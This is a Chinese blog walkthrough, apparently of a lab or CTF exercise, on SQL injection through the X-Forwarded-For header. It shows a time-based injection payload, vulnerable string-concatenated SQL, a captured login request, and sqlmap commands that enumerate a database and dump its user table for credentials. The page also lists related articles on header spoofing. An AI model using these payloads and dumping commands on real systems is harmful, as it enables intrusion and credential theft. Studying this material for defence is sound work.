X-Forwarded-For注入漏洞实战

最新推荐文章于 2024-05-23 15:06:54 发布
最新推荐文章于 2024-05-23 15:06:54 发布
阅读量1k 收藏 2
点赞数 1
分类专栏: # 攻防实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/why123wh/article/details/105914865
版权

介绍

  • 由于系统一般会采用String ip = request.getHeader(“X-Forwarded-For”);进行获取ip,然后注入者就可以通过X-Forwarded-For请求头信息就行伪造ip,当然了这个ip也可以是一些注入语句,如下
X-Forwarded-For:payload';WAITFOR DELAY '0:0:5'--

String sql = "select * from table where ip = '"+ip+"'";
  • 那么我们得到的sql语句就会是这样
select * from table where ip = payload';WAITFOR DELAY '0:0:5'--'
  • 这样就容易被人进行sql攻击,快看一下自己的项目里面是不是有这样的获取ip的方式,有的话如果sql没有预编译,那么肯定可以进行sql注入攻击

目标

  • 对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码。

步骤

  • burpsuite抓取,发送请求,返回失败信息和自己的IP
POST /index.php HTTP/1.1
Host: x.x.x.x:45584
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://x.x.x.x45584
Connection: close
Referer: http://x.x.x.x:45584/
Upgrade-Insecure-Requests: 1

username=admin&password=admin

在这里插入图片描述

  • 利用请求头X_Forwarded-For伪装为127.0.0.1进行测试

    • X-Forwarded-For:请求投中用于显示代理真实ip
      在这里插入图片描述

    • 复制请求体中的raw下的所有信息,存放到一个txt文件中
      在这里插入图片描述

    • 使用sqlmap执行以下语句爆出数据库

sqlmap -r xff.txt --dbs --batch

在这里插入图片描述

  • 爆出数据表
sqlmap -r xff.txt -D webcalendar --tables

在这里插入图片描述

  • 脱库,得到用户名和密码
sqlmap -r xff.txt -D webcalendar --tables -T user --dump

在这里插入图片描述

  • 登录,得到key
    在这里插入图片描述
why123wh
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web缓存投毒对多个HTTP头结合攻击实践
LISTONE的个人博客
05-16 471
Web缓存投毒对多个HTTP头结合攻击实践 某些网站容易受到简单的Web缓存中毒攻击。但是,有一些其他网站需要攻击者使用更复杂的攻击,并且仅在攻击者能够操纵多个 unkeyed 输入的请求时才变得脆弱。 例如,假设一个网站要求使用HTTPS进行安全通信。为了强制执行此操作,如果收到使用其他协议的请求,则网站会动态生成一个使用HTTPS的自身重定向: GET /random HTTP/1.1 Host: innocent-site.com X-Forwarded-Proto: http HTTP/1.1 3
X-Forwarded-For火狐插件
01-10
X-Forwarded-For火狐插件
X-Forward-For和Referer的相关知识点
qq_43511094的博客
03-21 1904
X-Forward-For和RefererX-Forward-ForReferer 前言 X-Forward-For和Referer通常出现在请求头环节,因为有些服务器会有求必须是特定的Referer或者特定的X-Forward-For,所以我们抓包之后要自己加入这两个参数,并修改他们的值 X-Forward-For X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端最真实的IP。只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。它不是RFC中定义的标准请求头信
Discuz!X ≤3.4 任意文件删除漏洞
最新发布
qq_52627570的博客
05-23 304
在浏览器中输入:http://your ip/install/index.php?在浏览器中输入:http://your ip/robots.txt。数据库服务器选择db,其他不改变,记得输入管理员密码哦。点击进入数据库,在设置->个人资料中随意填写一个信息。建立一个upload.html。在浏览器打开,并上传一个图片。提交后,发现信息已改变。至此,漏洞利用结束。
x-forward-for详解
真理部
10-09 1万+
http://www.cnblogs.com/xdjackfeng/p/3514120.htmlx-forward-for
X-Forwarded-For 客户端 IP 伪造过程及防范
笑忘哭的博客
01-18 7636
最近收到一条安全漏洞报告,通过利用代码漏洞,并结合HTTP扩展请求头 X-Forwarded-For 可以对客户端IP进行伪造,以达到非法目的。下面我将对这个漏洞进行介绍。 X-Forwarded-For 介绍 X-Forwarded-For 是一个 HTTP 扩展头部,用来表示HTTP请求端真实 IP,HTTP/1.1 协议并没有对它的定义,但现如今X-Forwarded-For已被各大 HTTP 代理、负载均衡等转发服务广泛使用。 X-Forwarded-For 请求头格式: X-Forwarded-
Web安全-HTTP Host头攻击
道阻且长,行则将至。
12-18 6128
漏洞背景 Host首部字段是HTTP/1.1新增的,旨在告诉服务器,客户端请求的主机名和端口号,主要用来实现虚拟主机技术。 运用虚拟主机技术,单个主机可以运行多个站点。以下图为例,hacker和usagidesign两个站点都运行在同一服务器A上,不管我们请求哪个域名,最终都会被解析成服务器A的IP地址,这个时候服务器就不知道该将请求交给哪个站点处理,因此需要Host字段指定请求的主机名。 我们访...
Chrome插件:X-Forwarded-For Header
12-15
标题“Chrome插件:X-Forwarded-For Header”揭示了本文将深入探讨一个专门针对Google Chrome浏览器的扩展应用,该插件的主要功能是处理和设置HTTP头中的`X-Forwarded-For`字段。`X-Forwarded-For`(简称XFF)头是一...
forwarded:解析HTTP X-Forwarded-For标头
05-11
从请求中解析X-Forwarded-For标头。 以相反的顺序返回地址数组,包括req的套接字地址(即索引0是套接字地址,最后一个索引是最远的地址,通常是最终用户)。 测验 $ npm test 执照 麻省理工学院
X-Forwarded-For Header-crx插件
04-02
此扩展允许您快速更新X-Forwarded-For,X-Originating-IP,X-Remote-IP和X-Remote-Addr HTTP标头,以进行各种测试。 变更日志:v0.6.2-修复了干扰此扩展的Firefox版本的错误v0.6.1-修复了CORS预检请求的问题v0.6.0-...
X-Forwarded-For Header_0.6.2_0.zip
08-24
此扩展允许您快速更新各种 X-Forwarded-For、X-Originating-IP、X-Remote-IP 和 X-Remote-Addr HTTP 标头 打开Chrome浏览器的扩展程序: 地址栏直接输入:chrome://extensions/ 把下载到的文件解压后,点击加载已...
使用nginx后如何在web应用中获取用户ip及原理解释
臻心依旧
08-28 2399
http://gong1208.iteye.com/blog/1559835   使用nginx后如何在web应用中获取用户ip及原理解释                                                                                                  -------gongyong   问题背景: 在实际
nginx中Host、X-Real-IP、X-Forwarded-For的作用
qq_37705525的博客
05-23 1355
nginx中Host、X-Real-IP、X-Forwarded-For的作用
检测到目标url存在http host头攻击漏洞_什么是主机头攻击?
weixin_39778218的博客
12-03 557
同一台Web服务器在同一IP地址上托管多个网站或Web应用程序是一种常见的做法。这就是主机头存在的原因。主机标头指定哪个网站或Web应用程序应处理传入的HTTP请求。Web服务器使用此标头的值将请求分派到指定的网站或Web应用程序。托管在相同IP地址上的每个Web应用程序通常称为虚拟主机。那么什么构成主机头攻击?如果我们指定了无效的主机头会怎样?大多数Web服务器都配置为将无法识别的主机标头传递到...
X-Forward-For 随笔-将X-FORWARD-FOR字段设置为域名
u011975363的专栏
09-10 5315
X-Forward-For 定义 x-forward-for 是http的协议中,头部中的一个字段,主要用于服务器获取发送请求数据包的客户端的真实IP。 有时候服务器端为了保护自己,或者为了提高用户 访问的效率,会使用反向代理和CDN(负载均衡)。 即客户访问数据的请求都发送给了代理,而不是真正服务器,然后由代理服务器向真正的服务器发送请求,这样客户就不知道服。务器的真实地址,很多博彩网站会...
4-Web安全——通过x-forward-for获取真实ip(入侵溯源)
网络安全
03-28 6036
参考资料:44-http协议 x-forward-for是http请求的一个字段,该字段表示客户端的IP地址,一般称为“XXF”头,服务端通过这个头可以知道客户端的真实或代理IP。x-forward-for字段虽然没有写入RFC标准,但已经应用到http协议中成为一个实施标准了。 x-forward-for字段的格式为: x-forward-for:client1,proxy1,proxy2,proxy3 该字段的ip地址值以逗分隔,其中client1代表真实的客户端的ip地址,...
伪造 X-Forwarded-For
intel80586
05-09 3万+
背景 应同学的要求,帮忙刷票。我上去看了一下,对方网站做了IP限制,一天之内一个IP只能投一票,并没有使用cookie校验,验证码校验等技术,总体来说这个网站的情况是比较常见的,常见的解决办法有两个: 使用大量的真实IP刷票 如果你使用的是一个拨号上网的网络,每次的拨号都能随机分配IP,这种情况下,可以使用投票一次,拨号一次的方法来实现刷票,但这个方案有两个问题: 1. 编程稍微复杂,
x-forward-for 取客户端ip
筱阳的博客
08-28 6363
如今利用nginx做负载均衡的实例已经很多了,针对不同的应用场合,还有很多需要注意的地方,本文要说的就是在通过CDN 后到达nginx做负载均衡时请求头中的X-Forwarded-For项到底发生了什么变化。下图为简单的web架构图: nginx 负载均衡 先来看一下X-Forwarded-For的定义: X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实...
x-forward-for获取客户端真实ip
热门推荐
na_tion的专栏
06-22 3万+
文章来源:http://www.360doc.com/myfollow.aspx 先来看一下X-Forwarded-For的定义: X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。它不是RFC中定义的标准请求头信息,在squid缓存代理服务器开发文档中可以找到该项的
x-forwarded-for注入漏洞实战
03-17
x-forwarded-for注入漏洞是一种常见的网络安全漏洞,攻击者可以通过伪造HTTP请求头中的x-forwarded-for字段,来绕过IP地址过滤和访问控制,从而实现攻击目标系统的目的。攻击者可以利用这个漏洞来进行各种攻击,比如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值